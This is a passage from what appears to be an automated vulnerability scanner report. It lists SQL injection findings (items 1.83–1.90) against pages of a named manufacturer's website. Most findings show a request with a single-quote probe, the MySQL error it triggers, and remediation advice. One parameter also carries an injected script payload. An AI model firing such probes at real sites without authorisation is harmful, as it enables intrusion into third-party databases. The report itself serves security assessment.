User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:52 GMT
Connection: Keep-Alive
Content-Length: 14835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/certifications.html?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 16538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

1.83. http://www.millerwelds.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:37 GMT
Connection: Keep-Alive
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico''' at line 1)<br>
...[SNIP]...

1.84. http://www.millerwelds.com/financing/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

The %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:11 GMT
Connection: Keep-Alive
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/scr' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000012)%3C/script%3E'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:13 GMT
Connection: Keep-Alive
Content-Length: 15521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.85. http://www.millerwelds.com/financing/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:18 GMT
Connection: Keep-Alive
Content-Length: 27887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?int_source=/products/accessories/international/&int_medium=bannerad&int_content' at line 1)<br>
...[SNIP]...

1.86. http://www.millerwelds.com/financing/ [int_campaign parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

The int_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:08 GMT
Connection: Keep-Alive
Content-Length: 13992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/?int_source=/products/accessories/international/&int_medium=bannerad' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:09 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.87. http://www.millerwelds.com/financing/ [int_content parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

The int_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace'&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:52 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace''&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:53 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.88. http://www.millerwelds.com/financing/ [int_medium parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

The int_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad'&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:33 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad''&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:35 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.89. http://www.millerwelds.com/financing/ [int_source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

The int_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the int_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/'&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:17 GMT
Connection: Keep-Alive
Content-Length: 13913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/''&int_medium=bannerad&int_content=blackspace&int_campaign=powerline HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:18 GMT
Connection: Keep-Alive
Content-Length: 15807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...

1.90. http://www.millerwelds.com/financing/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/financing/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.9.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:40 GMT
Connection: Keep-Alive
Content-Length: 13917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/international/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
